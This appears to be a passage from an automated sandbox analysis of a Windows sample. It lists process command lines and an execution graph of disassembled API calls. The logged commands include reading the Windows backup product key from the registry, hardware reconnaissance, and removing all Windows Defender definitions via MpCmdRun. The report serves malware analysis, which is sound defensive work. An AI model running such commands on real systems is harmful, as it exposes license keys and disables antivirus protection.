                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:80
                                                            Start time:16:16:27
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:81
                                                            Start time:16:16:27
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:82
                                                            Start time:16:16:27
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic path win32_VideoController get name
                                                            Imagebase:0x7ff7db190000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:83
                                                            Start time:16:16:28
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:84
                                                            Start time:16:16:28
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:85
                                                            Start time:16:16:28
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:86
                                                            Start time:16:16:30
                                                            Start date:20/07/2024
                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                            Imagebase:0x7ff7d3ef0000
                                                            File size:468'120 bytes
                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:8.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:19.3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:20
                                                              execution_graph 18628 7ff6fb1f9060 18631 7ff6fb1f8fe4 18628->18631 18638 7ff6fb1ff5e8 EnterCriticalSection 18631->18638 19392 7ff6fb1fa2e0 19393 7ff6fb1fa2e5 19392->19393 19394 7ff6fb1fa2fa 19392->19394 19398 7ff6fb1fa300 19393->19398 19399 7ff6fb1fa342 19398->19399 19400 7ff6fb1fa34a 19398->19400 19401 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19399->19401 19402 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19400->19402 19401->19400 19403 7ff6fb1fa357 19402->19403 19404 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19403->19404 19405 7ff6fb1fa364 19404->19405 19406 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19405->19406 19407 7ff6fb1fa371 19406->19407 19408 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19407->19408 19409 7ff6fb1fa37e 19408->19409 19410 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19409->19410 19411 7ff6fb1fa38b 19410->19411 19412 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19411->19412 19413 7ff6fb1fa398 19412->19413 19414 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19413->19414 19415 7ff6fb1fa3a5 19414->19415 19416 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19415->19416 19417 7ff6fb1fa3b5 19416->19417 19418 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19417->19418 19419 7ff6fb1fa3c5 19418->19419 19424 7ff6fb1fa1a4 19419->19424 19438 7ff6fb1ff5e8 EnterCriticalSection 19424->19438 15754 7ff6fb1ebf5c 15775 7ff6fb1ec12c 15754->15775 15757 7ff6fb1ec0a8 15898 7ff6fb1ec44c IsProcessorFeaturePresent 15757->15898 15758 7ff6fb1ebf78 __scrt_acquire_startup_lock 15760 7ff6fb1ec0b2 15758->15760 15765 7ff6fb1ebf96 __scrt_release_startup_lock 15758->15765 15761 7ff6fb1ec44c 7 API calls 15760->15761 15763 7ff6fb1ec0bd __GetCurrentState 15761->15763 15762 7ff6fb1ebfbb 15764 7ff6fb1ec041 15781 7ff6fb1ec594 15764->15781 15765->15762 15765->15764 15887 7ff6fb1f8e44 15765->15887 15767 7ff6fb1ec046 15784 7ff6fb1e1000 15767->15784 15772 7ff6fb1ec069 15772->15763 15894 7ff6fb1ec2b0 15772->15894 15776 7ff6fb1ec134 15775->15776 15777 7ff6fb1ec140 __scrt_dllmain_crt_thread_attach 15776->15777 15778 7ff6fb1ebf70 15777->15778 15779 7ff6fb1ec14d 15777->15779 15778->15757 15778->15758 15779->15778 15905 7ff6fb1ecba8 15779->15905 15932 7ff6fb2097e0 15781->15932 15783 7ff6fb1ec5ab GetStartupInfoW 15783->15767 15785 7ff6fb1e1009 15784->15785 15934 7ff6fb1f4794 15785->15934 15787 7ff6fb1e352b 15941 7ff6fb1e33e0 15787->15941 15794 7ff6fb1e356c 15797 7ff6fb1e1bf0 49 API calls 15794->15797 15795 7ff6fb1e3736 16141 7ff6fb1e3f70 15795->16141 15811 7ff6fb1e3588 15797->15811 15799 7ff6fb1e3785 15801 7ff6fb1e25f0 53 API calls 15799->15801 15878 7ff6fb1e3538 15801->15878 15803 7ff6fb1e365f __std_exception_destroy 15809 7ff6fb1e3834 15803->15809 15812 7ff6fb1e7e10 14 API calls 15803->15812 15804 7ff6fb1e3778 15805 7ff6fb1e379f 15804->15805 15806 7ff6fb1e377d 15804->15806 15808 7ff6fb1e1bf0 49 API calls 15805->15808 16160 7ff6fb1ef36c 15806->16160 15810 7ff6fb1e37be 15808->15810 15835 7ff6fb1e3805 __std_exception_destroy 15809->15835 16164 7ff6fb1e3e90 15809->16164 15820 7ff6fb1e18f0 115 API calls 15810->15820 16003 7ff6fb1e7e10 15811->16003 15814 7ff6fb1e36ae 15812->15814 16016 7ff6fb1e7f80 15814->16016 15815 7ff6fb1e3852 15817 7ff6fb1e3865 15815->15817 15818 7ff6fb1e3871 15815->15818 16167 7ff6fb1e3fe0 15817->16167 15819 7ff6fb1e1bf0 49 API calls 15818->15819 15819->15835 15823 7ff6fb1e37df 15820->15823 15821 7ff6fb1e36bd 15824 7ff6fb1e380f 15821->15824 15828 7ff6fb1e36cf 15821->15828 15823->15811 15827 7ff6fb1e37ef 15823->15827 16025 7ff6fb1e8400 15824->16025 15832 7ff6fb1e25f0 53 API calls 15827->15832 16021 7ff6fb1e1bf0 15828->16021 15831 7ff6fb1e389e SetDllDirectoryW 15838 7ff6fb1e38c3 15831->15838 15832->15878 16076 7ff6fb1e86b0 15835->16076 15836 7ff6fb1e36fc 16121 7ff6fb1e25f0 15836->16121 15840 7ff6fb1e3a50 15838->15840 16081 7ff6fb1e6560 15838->16081 15842 7ff6fb1e3a5a PostMessageW GetMessageW 15840->15842 15843 7ff6fb1e3a7d 15840->15843 15842->15843 16225 7ff6fb1e3080 15843->16225 15846 7ff6fb1e38ea 15848 7ff6fb1e3947 15846->15848 15849 7ff6fb1e3901 15846->15849 16170 7ff6fb1e65a0 15846->16170 15848->15840 15854 7ff6fb1e395c 15848->15854 15862 7ff6fb1e3905 15849->15862 16191 7ff6fb1e6970 15849->16191 16101 7ff6fb1e30e0 15854->16101 15858 7ff6fb1e6780 FreeLibrary 15861 7ff6fb1e3aa3 15858->15861 15862->15848 16207 7ff6fb1e2870 15862->16207 16132 7ff6fb1eb870 15878->16132 15888 7ff6fb1f8e7c 15887->15888 15889 7ff6fb1f8e5b 15887->15889 18413 7ff6fb1f96e8 15888->18413 15889->15764 15892 7ff6fb1ec5d8 GetModuleHandleW 15893 7ff6fb1ec5e9 15892->15893 15893->15772 15895 7ff6fb1ec2c1 15894->15895 15896 7ff6fb1ec080 15895->15896 15897 7ff6fb1ecba8 7 API calls 15895->15897 15896->15762 15897->15896 15899 7ff6fb1ec472 __GetCurrentState memcpy_s 15898->15899 15900 7ff6fb1ec491 RtlCaptureContext RtlLookupFunctionEntry 15899->15900 15901 7ff6fb1ec4ba RtlVirtualUnwind 15900->15901 15902 7ff6fb1ec4f6 memcpy_s 15900->15902 15901->15902 15903 7ff6fb1ec528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15902->15903 15904 7ff6fb1ec576 __GetCurrentState 15903->15904 15904->15760 15906 7ff6fb1ecbb0 15905->15906 15907 7ff6fb1ecbba 15905->15907 15911 7ff6fb1ecf44 15906->15911 15907->15778 15912 7ff6fb1ecf53 15911->15912 15913 7ff6fb1ecbb5 15911->15913 15919 7ff6fb1ed180 15912->15919 15915 7ff6fb1ecfb0 15913->15915 15916 7ff6fb1ecfdb 15915->15916 15917 7ff6fb1ecfbe DeleteCriticalSection 15916->15917 15918 7ff6fb1ecfdf 15916->15918 15917->15916 15918->15907 15923 7ff6fb1ecfe8 15919->15923 15924 7ff6fb1ed0d2 TlsFree 15923->15924 15930 7ff6fb1ed02c __vcrt_FlsAlloc 15923->15930 15925 7ff6fb1ed05a LoadLibraryExW 15927 7ff6fb1ed07b GetLastError 15925->15927 15928 7ff6fb1ed0f9 15925->15928 15926 7ff6fb1ed119 GetProcAddress 15926->15924 15927->15930 15928->15926 15929 7ff6fb1ed110 FreeLibrary 15928->15929 15929->15926 15930->15924 15930->15925 15930->15926 15931 7ff6fb1ed09d LoadLibraryExW 15930->15931 15931->15928 15931->15930 15933 7ff6fb2097d0 15932->15933 15933->15783 15933->15933 15935 7ff6fb1fe790 15934->15935 15937 7ff6fb1fe836 15935->15937 15938 7ff6fb1fe7e3 15935->15938 16248 7ff6fb1fe668 15937->16248 16238 7ff6fb1f9b24 15938->16238 15940 7ff6fb1fe80c 15940->15787 16355 7ff6fb1ebb70 15941->16355 15944 7ff6fb1e341b 16362 7ff6fb1e29e0 15944->16362 15945 7ff6fb1e3438 16357 7ff6fb1e85a0 FindFirstFileExW 15945->16357 15949 7ff6fb1e34a5 16381 7ff6fb1e8760 15949->16381 15950 7ff6fb1e344b 16372 7ff6fb1e8620 CreateFileW 15950->16372 15952 7ff6fb1eb870 _log10_special 8 API calls 15954 7ff6fb1e34dd 15952->15954 15954->15878 15963 7ff6fb1e18f0 15954->15963 15956 7ff6fb1e342e 15956->15952 15957 7ff6fb1e34b3 15957->15956 15960 7ff6fb1e26c0 49 API calls 15957->15960 15958 7ff6fb1e3474 __vcrt_FlsAlloc 15958->15949 15959 7ff6fb1e345c 16375 7ff6fb1e26c0 15959->16375 15960->15956 15964 7ff6fb1e3f70 108 API calls 15963->15964 15965 7ff6fb1e1925 15964->15965 15967 7ff6fb1e76a0 83 API calls 15965->15967 15973 7ff6fb1e1bb6 15965->15973 15966 7ff6fb1eb870 _log10_special 8 API calls 15969 7ff6fb1e1bd1 15966->15969 15968 7ff6fb1e196b 15967->15968 16002 7ff6fb1e199c 15968->16002 16786 7ff6fb1ef9f4 15968->16786 15969->15794 15969->15795 15971 7ff6fb1ef36c 74 API calls 15971->15973 15972 7ff6fb1e1985 15974 7ff6fb1e19a1 15972->15974 15975 7ff6fb1e1989 15972->15975 15973->15966 16790 7ff6fb1ef6bc 15974->16790 16793 7ff6fb1e2760 15975->16793 15979 7ff6fb1e19bf 15981 7ff6fb1e2760 53 API calls 15979->15981 15980 7ff6fb1e19d7 15982 7ff6fb1e19ee 15980->15982 15983 7ff6fb1e1a06 15980->15983 15981->16002 15984 7ff6fb1e2760 53 API calls 15982->15984 15985 7ff6fb1e1bf0 49 API calls 15983->15985 15984->16002 15986 7ff6fb1e1a1d 15985->15986 15987 7ff6fb1e1bf0 49 API calls 15986->15987 15988 7ff6fb1e1a68 15987->15988 15989 7ff6fb1ef9f4 73 API calls 15988->15989 15990 7ff6fb1e1a8c 15989->15990 15991 7ff6fb1e1aa1 15990->15991 15992 7ff6fb1e1ab9 15990->15992 15994 7ff6fb1e2760 53 API calls 15991->15994 15993 7ff6fb1ef6bc _fread_nolock 53 API calls 15992->15993 15995 7ff6fb1e1ace 15993->15995 15994->16002 15996 7ff6fb1e1ad4 15995->15996 15997 7ff6fb1e1aec 15995->15997 15998 7ff6fb1e2760 53 API calls 15996->15998 16810 7ff6fb1ef430 15997->16810 15998->16002 16001 7ff6fb1e25f0 53 API calls 16001->16002 16002->15971 16002->16002 16004 7ff6fb1e7e1a 16003->16004 16005 7ff6fb1e86b0 2 API calls 16004->16005 16006 7ff6fb1e7e39 GetEnvironmentVariableW 16005->16006 16007 7ff6fb1e7ea2 16006->16007 16008 7ff6fb1e7e56 ExpandEnvironmentStringsW 16006->16008 16009 7ff6fb1eb870 _log10_special 8 API calls 16007->16009 16008->16007 16010 7ff6fb1e7e78 16008->16010 16011 7ff6fb1e7eb4 16009->16011 16012 7ff6fb1e8760 2 API calls 16010->16012 16011->15803 16013 7ff6fb1e7e8a 16012->16013 16014 7ff6fb1eb870 _log10_special 8 API calls 16013->16014 16015 7ff6fb1e7e9a 16014->16015 16015->15803 16017 7ff6fb1e86b0 2 API calls 16016->16017 16018 7ff6fb1e7f94 16017->16018 17019 7ff6fb1f7548 16018->17019 16020 7ff6fb1e7fa6 __std_exception_destroy 16020->15821 16022 7ff6fb1e1c15 16021->16022 16023 7ff6fb1f3ca4 49 API calls 16022->16023 16024 7ff6fb1e1c38 16023->16024 16024->15835 16024->15836 16026 7ff6fb1e8415 16025->16026 17037 7ff6fb1e7b50 GetCurrentProcess OpenProcessToken 16026->17037 16029 7ff6fb1e7b50 7 API calls 16030 7ff6fb1e8441 16029->16030 16031 7ff6fb1e8474 16030->16031 16032 7ff6fb1e845a 16030->16032 16034 7ff6fb1e2590 48 API calls 16031->16034 16033 7ff6fb1e2590 48 API calls 16032->16033 16035 7ff6fb1e8472 16033->16035 16036 7ff6fb1e8487 LocalFree LocalFree 16034->16036 16035->16036 16037 7ff6fb1e84a3 16036->16037 16039 7ff6fb1e84af 16036->16039 17047 7ff6fb1e2940 16037->17047 16040 7ff6fb1eb870 _log10_special 8 API calls 16039->16040 16077 7ff6fb1e86d2 MultiByteToWideChar 16076->16077 16079 7ff6fb1e86f6 16076->16079 16077->16079 16080 7ff6fb1e870c __std_exception_destroy 16077->16080 16078 7ff6fb1e8713 MultiByteToWideChar 16078->16080 16079->16078 16079->16080 16080->15831 16082 7ff6fb1e6575 16081->16082 16083 7ff6fb1e38d5 16082->16083 16084 7ff6fb1e2760 53 API calls 16082->16084 16085 7ff6fb1e6b00 16083->16085 16084->16083 16086 7ff6fb1e6b30 16085->16086 16095 7ff6fb1e6b4a __std_exception_destroy 16085->16095 16086->16095 17331 7ff6fb1e1440 16086->17331 16088 7ff6fb1e6b54 16089 7ff6fb1e3fe0 49 API calls 16088->16089 16088->16095 16090 7ff6fb1e6b76 16089->16090 16091 7ff6fb1e6b7b 16090->16091 16092 7ff6fb1e3fe0 49 API calls 16090->16092 16093 7ff6fb1e2870 53 API calls 16091->16093 16094 7ff6fb1e6b9a 16092->16094 16093->16095 16094->16091 16096 7ff6fb1e3fe0 49 API calls 16094->16096 16095->15846 16097 7ff6fb1e6bb6 16096->16097 16097->16091 16098 7ff6fb1e6bbf 16097->16098 16099 7ff6fb1e25f0 53 API calls 16098->16099 16100 7ff6fb1e6c2f __std_exception_destroy memcpy_s 16098->16100 16099->16095 16100->15846 16117 7ff6fb1e30ee memcpy_s 16101->16117 16102 7ff6fb1eb870 _log10_special 8 API calls 16104 7ff6fb1e338e 16102->16104 16103 7ff6fb1e32e7 16103->16102 16104->15878 16120 7ff6fb1e83e0 LocalFree 16104->16120 16106 7ff6fb1e1bf0 49 API calls 16106->16117 16107 7ff6fb1e3309 16109 7ff6fb1e25f0 53 API calls 16107->16109 16109->16103 16112 7ff6fb1e32e9 16114 7ff6fb1e25f0 53 API calls 16112->16114 16113 7ff6fb1e2870 53 API calls 16113->16117 16114->16103 16117->16103 16117->16106 16117->16107 16117->16112 16117->16113 16118 7ff6fb1e32f7 16117->16118 17392 7ff6fb1e3f10 16117->17392 17398 7ff6fb1e7530 16117->17398 17410 7ff6fb1e15c0 16117->17410 17448 7ff6fb1e68e0 16117->17448 17452 7ff6fb1e3b40 16117->17452 17496 7ff6fb1e3e00 16117->17496 16119 7ff6fb1e25f0 53 API calls 16118->16119 16119->16103 16122 7ff6fb1e262a 16121->16122 16123 7ff6fb1f3ca4 49 API calls 16122->16123 16124 7ff6fb1e2652 16123->16124 16125 7ff6fb1e86b0 2 API calls 16124->16125 16126 7ff6fb1e266a 16125->16126 16127 7ff6fb1e268e MessageBoxA 16126->16127 16128 7ff6fb1e2677 MessageBoxW 16126->16128 16129 7ff6fb1e26a0 16127->16129 16128->16129 16133 7ff6fb1eb879 16132->16133 16134 7ff6fb1e372a 16133->16134 16135 7ff6fb1ebc00 IsProcessorFeaturePresent 16133->16135 16134->15892 16136 7ff6fb1ebc18 16135->16136 17632 7ff6fb1ebdf8 RtlCaptureContext 16136->17632 16142 7ff6fb1e3f7c 16141->16142 16143 7ff6fb1e86b0 2 API calls 16142->16143 16144 7ff6fb1e3fa4 16143->16144 16145 7ff6fb1e86b0 2 API calls 16144->16145 16146 7ff6fb1e3fb7 16145->16146 17637 7ff6fb1f52a4 16146->17637 16149 7ff6fb1eb870 _log10_special 8 API calls 16150 7ff6fb1e3746 16149->16150 16150->15799 16151 7ff6fb1e76a0 16150->16151 16152 7ff6fb1e76c4 16151->16152 16153 7ff6fb1e779b __std_exception_destroy 16152->16153 16154 7ff6fb1ef9f4 73 API calls 16152->16154 16153->15804 16155 7ff6fb1e76e0 16154->16155 16155->16153 18029 7ff6fb1f6bd8 16155->18029 16157 7ff6fb1ef9f4 73 API calls 16159 7ff6fb1e76f5 16157->16159 16158 7ff6fb1ef6bc _fread_nolock 53 API calls 16158->16159 16159->16153 16159->16157 16159->16158 16161 7ff6fb1ef39c 16160->16161 18044 7ff6fb1ef148 16161->18044 16163 7ff6fb1ef3b5 16163->15799 16165 7ff6fb1e1bf0 49 API calls 16164->16165 16166 7ff6fb1e3ead 16165->16166 16166->15815 16168 7ff6fb1e1bf0 49 API calls 16167->16168 16169 7ff6fb1e4010 16168->16169 16169->15835 16180 7ff6fb1e65bc 16170->16180 16171 7ff6fb1eb870 _log10_special 8 API calls 16173 7ff6fb1e66f1 16171->16173 16172 7ff6fb1e17e0 45 API calls 16172->16180 16173->15849 16174 7ff6fb1e675d 16176 7ff6fb1e25f0 53 API calls 16174->16176 16175 7ff6fb1e1bf0 49 API calls 16175->16180 16188 7ff6fb1e66df 16176->16188 16177 7ff6fb1e674a 16178 7ff6fb1e25f0 53 API calls 16177->16178 16178->16188 16179 7ff6fb1e3f10 10 API calls 16179->16180 16180->16172 16180->16174 16180->16175 16180->16177 16180->16179 16181 7ff6fb1e670d 16180->16181 16182 7ff6fb1e7530 52 API calls 16180->16182 16184 7ff6fb1e2870 53 API calls 16180->16184 16185 7ff6fb1e6737 16180->16185 16186 7ff6fb1e15c0 118 API calls 16180->16186 16180->16188 16189 7ff6fb1e6720 16180->16189 16183 7ff6fb1e25f0 53 API calls 16181->16183 16182->16180 16183->16188 16184->16180 16187 7ff6fb1e25f0 53 API calls 16185->16187 16186->16180 16187->16188 16188->16171 16190 7ff6fb1e25f0 53 API calls 16189->16190 16190->16188 18055 7ff6fb1e81a0 16191->18055 16193 7ff6fb1e6989 16194 7ff6fb1e81a0 3 API calls 16193->16194 16195 7ff6fb1e699c 16194->16195 16196 7ff6fb1e69cf 16195->16196 16198 7ff6fb1e69b4 16195->16198 16197 7ff6fb1e25f0 53 API calls 16196->16197 16199 7ff6fb1e3916 16197->16199 18059 7ff6fb1e6ea0 GetProcAddress 16198->18059 16199->15862 16201 7ff6fb1e6cd0 16199->16201 16202 7ff6fb1e6ced 16201->16202 16208 7ff6fb1e28aa 16207->16208 16209 7ff6fb1f3ca4 49 API calls 16208->16209 16210 7ff6fb1e28d2 16209->16210 16211 7ff6fb1e86b0 2 API calls 16210->16211 16212 7ff6fb1e28ea 16211->16212 16213 7ff6fb1e290e MessageBoxA 16212->16213 16214 7ff6fb1e28f7 MessageBoxW 16212->16214 16215 7ff6fb1e2920 16213->16215 16214->16215 16216 7ff6fb1eb870 _log10_special 8 API calls 16215->16216 16217 7ff6fb1e2930 16216->16217 16218 7ff6fb1e6780 16217->16218 16219 7ff6fb1e68d6 16218->16219 16224 7ff6fb1e6792 16218->16224 16219->15848 18124 7ff6fb1e5af0 16225->18124 16228 7ff6fb1e30b9 16234 7ff6fb1e33a0 16228->16234 16235 7ff6fb1e33ae 16234->16235 16236 7ff6fb1e33bf 16235->16236 18412 7ff6fb1e8180 FreeLibrary 16235->18412 16236->15858 16255 7ff6fb1f986c 16238->16255 16241 7ff6fb1f9b5f 16241->15940 16354 7ff6fb1f477c EnterCriticalSection 16248->16354 16256 7ff6fb1f98c3 16255->16256 16257 7ff6fb1f9888 GetLastError 16255->16257 16256->16241 16261 7ff6fb1f98d8 16256->16261 16258 7ff6fb1f9898 16257->16258 16268 7ff6fb1fa6a0 16258->16268 16262 7ff6fb1f98f4 GetLastError SetLastError 16261->16262 16263 7ff6fb1f990c 16261->16263 16262->16263 16263->16241 16264 7ff6fb1f9c10 IsProcessorFeaturePresent 16263->16264 16265 7ff6fb1f9c23 16264->16265 16346 7ff6fb1f9924 16265->16346 16269 7ff6fb1fa6bf FlsGetValue 16268->16269 16270 7ff6fb1fa6da FlsSetValue 16268->16270 16271 7ff6fb1fa6d4 16269->16271 16272 7ff6fb1f98b3 SetLastError 16269->16272 16270->16272 16273 7ff6fb1fa6e7 16270->16273 16271->16270 16272->16256 16285 7ff6fb1fdea8 16273->16285 16276 7ff6fb1fa714 FlsSetValue 16279 7ff6fb1fa732 16276->16279 16280 7ff6fb1fa720 FlsSetValue 16276->16280 16277 7ff6fb1fa704 FlsSetValue 16278 7ff6fb1fa70d 16277->16278 16292 7ff6fb1f9c58 16278->16292 16298 7ff6fb1fa204 16279->16298 16280->16278 16290 7ff6fb1fdeb9 _get_daylight 16285->16290 16286 7ff6fb1fdf0a 16306 7ff6fb1f43f4 16286->16306 16287 7ff6fb1fdeee RtlAllocateHeap 16288 7ff6fb1fa6f6 16287->16288 16287->16290 16288->16276 16288->16277 16290->16286 16290->16287 16303 7ff6fb2028a0 16290->16303 16293 7ff6fb1f9c8c 16292->16293 16294 7ff6fb1f9c5d RtlRestoreThreadPreferredUILanguages 16292->16294 16293->16272 16294->16293 16295 7ff6fb1f9c78 GetLastError 16294->16295 16296 7ff6fb1f9c85 Concurrency::details::SchedulerProxy::DeleteThis 16295->16296 16297 7ff6fb1f43f4 _get_daylight 9 API calls 16296->16297 16297->16293 16332 7ff6fb1fa0dc 16298->16332 16309 7ff6fb2028e0 16303->16309 16315 7ff6fb1fa5d8 GetLastError 16306->16315 16308 7ff6fb1f43fd 16308->16288 16314 7ff6fb1ff5e8 EnterCriticalSection 16309->16314 16316 7ff6fb1fa619 FlsSetValue 16315->16316 16320 7ff6fb1fa5fc 16315->16320 16317 7ff6fb1fa62b 16316->16317 16321 7ff6fb1fa609 16316->16321 16319 7ff6fb1fdea8 _get_daylight 5 API calls 16317->16319 16318 7ff6fb1fa685 SetLastError 16318->16308 16322 7ff6fb1fa63a 16319->16322 16320->16316 16320->16321 16321->16318 16323 7ff6fb1fa658 FlsSetValue 16322->16323 16324 7ff6fb1fa648 FlsSetValue 16322->16324 16325 7ff6fb1fa664 FlsSetValue 16323->16325 16326 7ff6fb1fa676 16323->16326 16327 7ff6fb1fa651 16324->16327 16325->16327 16328 7ff6fb1fa204 _get_daylight 5 API calls 16326->16328 16329 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16327->16329 16330 7ff6fb1fa67e 16328->16330 16329->16321 16331 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16330->16331 16331->16318 16344 7ff6fb1ff5e8 EnterCriticalSection 16332->16344 16347 7ff6fb1f995e __GetCurrentState memcpy_s 16346->16347 16348 7ff6fb1f9986 RtlCaptureContext RtlLookupFunctionEntry 16347->16348 16349 7ff6fb1f99c0 RtlVirtualUnwind 16348->16349 16350 7ff6fb1f99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16348->16350 16349->16350 16351 7ff6fb1f9a48 __GetCurrentState 16350->16351 16352 7ff6fb1eb870 _log10_special 8 API calls 16351->16352 16353 7ff6fb1f9a67 GetCurrentProcess TerminateProcess 16352->16353 16356 7ff6fb1e33ec GetModuleFileNameW 16355->16356 16356->15944 16356->15945 16358 7ff6fb1e85df FindClose 16357->16358 16359 7ff6fb1e85f2 16357->16359 16358->16359 16360 7ff6fb1eb870 _log10_special 8 API calls 16359->16360 16361 7ff6fb1e3442 16360->16361 16361->15949 16361->15950 16363 7ff6fb1ebb70 16362->16363 16364 7ff6fb1e29fc GetLastError 16363->16364 16365 7ff6fb1e2a29 16364->16365 16386 7ff6fb1f3ef8 16365->16386 16370 7ff6fb1eb870 _log10_special 8 API calls 16371 7ff6fb1e2ae5 16370->16371 16371->15956 16373 7ff6fb1e8660 GetFinalPathNameByHandleW CloseHandle 16372->16373 16374 7ff6fb1e3458 16372->16374 16373->16374 16374->15958 16374->15959 16376 7ff6fb1e26fa 16375->16376 16377 7ff6fb1f3ef8 48 API calls 16376->16377 16378 7ff6fb1e2722 MessageBoxW 16377->16378 16379 7ff6fb1eb870 _log10_special 8 API calls 16378->16379 16380 7ff6fb1e274c 16379->16380 16380->15956 16382 7ff6fb1e87b5 16381->16382 16383 7ff6fb1e878a WideCharToMultiByte 16381->16383 16384 7ff6fb1e87d2 WideCharToMultiByte 16382->16384 16385 7ff6fb1e87cb __std_exception_destroy 16382->16385 16383->16382 16383->16385 16384->16385 16385->15957 16387 7ff6fb1f3f52 16386->16387 16388 7ff6fb1f3f77 16387->16388 16389 7ff6fb1f3fb3 16387->16389 16390 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16388->16390 16408 7ff6fb1f22b0 16389->16408 16392 7ff6fb1f3fa1 16390->16392 16393 7ff6fb1eb870 _log10_special 8 API calls 16392->16393 16396 7ff6fb1e2a54 FormatMessageW 16393->16396 16394 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16394->16392 16404 7ff6fb1e2590 16396->16404 16397 7ff6fb1f4094 16397->16394 16398 7ff6fb1f40ba 16398->16397 16401 7ff6fb1f40c4 16398->16401 16399 7ff6fb1f4069 16402 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16399->16402 16400 7ff6fb1f4060 16400->16397 16400->16399 16403 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16401->16403 16402->16392 16403->16392 16405 7ff6fb1e25b5 16404->16405 16406 7ff6fb1f3ef8 48 API calls 16405->16406 16407 7ff6fb1e25d8 MessageBoxW 16406->16407 16407->16370 16409 7ff6fb1f22ee 16408->16409 16414 7ff6fb1f22de 16408->16414 16410 7ff6fb1f22f7 